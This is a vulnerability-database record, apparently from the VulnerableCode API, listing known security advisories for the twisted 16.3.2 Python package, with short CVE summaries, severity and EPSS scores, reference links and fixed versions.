Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:pypi/twisted@16.3.2
Typepypi
Namespace
Nametwisted
Version16.3.2
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version24.7.0rc1
Latest_non_vulnerable_version24.7.0rc1
Affected_by_vulnerabilities
0
url VCID-31hv-tjeu-1ucm
vulnerability_id VCID-31hv-tjeu-1ucm
summary In Twisted before 19.2.1, twisted.web did not validate or sanitize URIs or HTTP methods, allowing an attacker to inject invalid characters such as CRLF.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html
reference_id
reference_type
scores
url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html
reference_id
reference_type
scores
url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html
2
reference_url https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2
reference_id
reference_type
scores
url https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2
3
reference_url https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html
reference_id
reference_type
scores
url https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html
4
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/
5
reference_url https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html
reference_id
reference_type
scores
url https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html
6
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
7
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
8
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
url https://www.oracle.com/security-alerts/cpuapr2020.html
fixed_packages
0
url pkg:pypi/twisted@19.2.1
purl pkg:pypi/twisted@19.2.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-f9bv-6a83-eyb7
3
vulnerability VCID-qavz-rft9-7bfb
4
vulnerability VCID-qc7c-e5fb-77f1
5
vulnerability VCID-qtwh-as1r-6ka5
6
vulnerability VCID-rzad-s8tu-47gm
7
vulnerability VCID-szfx-665h-w3eb
8
vulnerability VCID-tec3-uqmg-tueq
9
vulnerability VCID-vcw1-fzw7-43f5
10
vulnerability VCID-vz8r-fhqf-zudf
11
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@19.2.1
aliases PYSEC-2019-58
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-31hv-tjeu-1ucm
1
url VCID-562c-1hjs-hqau
vulnerability_id VCID-562c-1hjs-hqau
summary Twisted is an event-based framework for internet applications, supporting Python 3.6+. The `twisted.web.util.redirectTo` function contains an HTML injection vulnerability. If application code allows an attacker to control the redirect URL this vulnerability may result in Reflected Cross-Site Scripting (XSS) in the redirect response HTML body. This vulnerability is fixed in 24.7.0rc1.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41810.json
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41810.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-41810
reference_id
reference_type
scores
0
value 0.67844
scoring_system epss
scoring_elements 0.98586
published_at 2026-04-13T12:55:00Z
1
value 0.67844
scoring_system epss
scoring_elements 0.98585
published_at 2026-04-12T12:55:00Z
2
value 0.67844
scoring_system epss
scoring_elements 0.98583
published_at 2026-04-09T12:55:00Z
3
value 0.67844
scoring_system epss
scoring_elements 0.98582
published_at 2026-04-08T12:55:00Z
4
value 0.67844
scoring_system epss
scoring_elements 0.9858
published_at 2026-04-07T12:55:00Z
5
value 0.67844
scoring_system epss
scoring_elements 0.98578
published_at 2026-04-04T12:55:00Z
6
value 0.67844
scoring_system epss
scoring_elements 0.98575
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-41810
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41810
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41810
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2024-75.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2024-75.yaml
5
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
6
reference_url https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T16:39:25Z/
url https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
7
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-cf56-g6w6-pqq2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T16:39:25Z/
url https://github.com/twisted/twisted/security/advisories/GHSA-cf56-g6w6-pqq2
8
reference_url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-41810
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-41810
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077680
reference_id 1077680
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077680
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2300497
reference_id 2300497
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2300497
12
reference_url https://github.com/advisories/GHSA-cf56-g6w6-pqq2
reference_id GHSA-cf56-g6w6-pqq2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cf56-g6w6-pqq2
13
reference_url https://access.redhat.com/errata/RHSA-2024:7312
reference_id RHSA-2024:7312
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:7312
14
reference_url https://usn.ubuntu.com/6988-1/
reference_id USN-6988-1
reference_type
scores
url https://usn.ubuntu.com/6988-1/
fixed_packages
0
url pkg:pypi/twisted@24.7.0rc1
purl pkg:pypi/twisted@24.7.0rc1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@24.7.0rc1
aliases CVE-2024-41810, GHSA-cf56-g6w6-pqq2, PYSEC-2024-75
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-562c-1hjs-hqau
2
url VCID-7d7z-nhf1-kyhc
vulnerability_id VCID-7d7z-nhf1-kyhc
summary In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10109.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10109.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-10109
reference_id
reference_type
scores
0
value 0.03518
scoring_system epss
scoring_elements 0.87641
published_at 2026-04-13T12:55:00Z
1
value 0.03518
scoring_system epss
scoring_elements 0.87644
published_at 2026-04-12T12:55:00Z
2
value 0.03518
scoring_system epss
scoring_elements 0.87649
published_at 2026-04-11T12:55:00Z
3
value 0.03518
scoring_system epss
scoring_elements 0.87637
published_at 2026-04-09T12:55:00Z
4
value 0.03518
scoring_system epss
scoring_elements 0.87631
published_at 2026-04-08T12:55:00Z
5
value 0.03518
scoring_system epss
scoring_elements 0.87611
published_at 2026-04-07T12:55:00Z
6
value 0.03518
scoring_system epss
scoring_elements 0.87595
published_at 2026-04-02T12:55:00Z
7
value 0.03518
scoring_system epss
scoring_elements 0.87609
published_at 2026-04-04T12:55:00Z
8
value 0.03518
scoring_system epss
scoring_elements 0.87586
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-10109
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10109
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10109
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/advisories/GHSA-p5xh-vx83-mxcj
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-p5xh-vx83-mxcj
5
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2020-260.yaml
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2020-260.yaml
6
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
7
reference_url https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13
8
reference_url https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281
9
reference_url https://know.bishopfox.com/advisories
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://know.bishopfox.com/advisories
10
reference_url https://know.bishopfox.com/advisories/twisted-version-19.10.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://know.bishopfox.com/advisories/twisted-version-19.10.0
11
reference_url https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
14
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
15
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
16
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
17
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
18
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
19
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
20
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-10109
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:P/A:P
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-10109
21
reference_url https://security.gentoo.org/glsa/202007-24
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.gentoo.org/glsa/202007-24
22
reference_url https://usn.ubuntu.com/4308-1
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-1
23
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
24
reference_url https://usn.ubuntu.com/4308-2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-2
25
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
26
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1813447
reference_id 1813447
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1813447
27
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953950
reference_id 953950
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953950
28
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
36
reference_url https://access.redhat.com/errata/RHSA-2020:1561
reference_id RHSA-2020:1561
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1561
fixed_packages
0
url pkg:pypi/twisted@20.3.0rc1
purl pkg:pypi/twisted@20.3.0rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-qc7c-e5fb-77f1
3
vulnerability VCID-qtwh-as1r-6ka5
4
vulnerability VCID-rzad-s8tu-47gm
5
vulnerability VCID-tec3-uqmg-tueq
6
vulnerability VCID-vcw1-fzw7-43f5
7
vulnerability VCID-vz8r-fhqf-zudf
8
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@20.3.0rc1
1
url pkg:pypi/twisted@20.3.0
purl pkg:pypi/twisted@20.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-qc7c-e5fb-77f1
2
vulnerability VCID-rzad-s8tu-47gm
3
vulnerability VCID-tec3-uqmg-tueq
4
vulnerability VCID-vz8r-fhqf-zudf
5
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@20.3.0
aliases CVE-2020-10109, GHSA-p5xh-vx83-mxcj, PYSEC-2020-260
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7d7z-nhf1-kyhc
3
url VCID-f9bv-6a83-eyb7
vulnerability_id VCID-f9bv-6a83-eyb7
summary In words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00013.html
reference_id
reference_type
scores
url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00013.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00028.html
reference_id
reference_type
scores
url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00028.html
2
reference_url https://github.com/twisted/twisted/pull/1147
reference_id
reference_type
scores
url https://github.com/twisted/twisted/pull/1147
3
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ/
4
reference_url https://twistedmatrix.com/trac/ticket/9561
reference_id
reference_type
scores
url https://twistedmatrix.com/trac/ticket/9561
5
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
